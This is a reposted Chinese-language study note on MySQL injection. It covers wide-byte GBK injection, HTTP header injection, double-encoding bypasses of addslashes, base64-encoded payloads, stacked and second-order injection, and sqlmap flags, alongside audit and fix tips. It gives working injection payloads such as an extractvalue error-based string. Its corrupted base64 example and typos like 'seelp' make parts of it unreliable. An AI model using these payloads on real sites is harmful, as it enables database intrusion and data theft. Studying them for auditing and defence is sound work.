数据库
首页 > 数据库> > MYSQL其他注入

MYSQL其他注入

作者:互联网

if(length(database())>1,seelp(5),1)

双字节编码

set character_set_client=gbk

连续两个字节,都符合gbk取值范围时会自动解析为一个汉字

第一个(81-FE)第二个(40-FE)

白盒审计

  看编码格式是否为GBK格式

  是否使用了preg_replace()函数

  addslashes()函数进行转义

  是否使用了mysql_real_escape_string()函数进行转义

 

mysql_query+addslashes() 函数使用会存在宽字节注入

mysql_query+real_escape_string()函数,存在宽字节注入

mysql_set_charset+addslashes()函数,存在宽字节注入

 

mysql_set_charset+mysql_real_escape_string()函数不存在宽字节注入

 

 

http头注入点

  User-Agent 、cookie、X-Forwarded-For、Client-ip、rerferer、host、等等......

  造成原因:web程序将用户提交的http请求头信息未作过滤就带入了数据库执行

 

  insert into uagents('uagent','ip_address','username') values('xxxxx','xxxxx','xxxxx')

  a' and extractvalue(1,concat(0x7e,(select version()),0x7e)) and 'a'='a

 

 

 

 

二次编码注入

  ?id=1%2527 >>传到服务器,服务器进行解码1%27 >> addslashes编码>>1%27 >> urldecode()再次解码1’

  addslashes($_GET['id']) >> urldecode($id)/rawurldecode()

  原因是两个函数顺序颠倒,应该先urldecode()/rawurldecode()>>再addslashes()

  

base_64注入,‘)闭合

admin’)and extractvalue(1,concat(0x7e,(select database()),0x7e))-- -

编码后YWRtaWundefinedZKWFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKS0tIC0=

 

 

堆叠注入

mysql+php 特殊:mysqli_multi_query支持 mysql_query不支持 

mssql+any api

oracle+any api 不支持

堆叠注入的前提是需要知道数据库的相关信息,如表名,列名.....

1';version();-- -

 

 

未完!!!

 

二次注入:在数据取出时未作过滤造成

修复进行转义,addslashes()

 

  -u 网址

  --dbs 查看所有数据库

  --current-db

 

标签:字节,addslashes,MYSQL,函数,其他,mysql,query,注入
来源: https://www.cnblogs.com/PatrickStar88888888/p/15225306.html